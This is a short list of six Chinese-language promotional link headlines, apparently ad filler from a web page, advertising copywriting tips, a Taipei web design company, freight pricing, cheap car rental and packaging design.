※教你寫出一流的銷售文案?

※廣告預算用在刀口上，台北網頁設計公司幫您達到更多曝光效益

※回頭車貨運收費標準

※別再煩惱如何寫文案,掌握八大原則!

※超省錢租車方案

※產品缺大量曝光嗎?你需要的是一流包裝設計!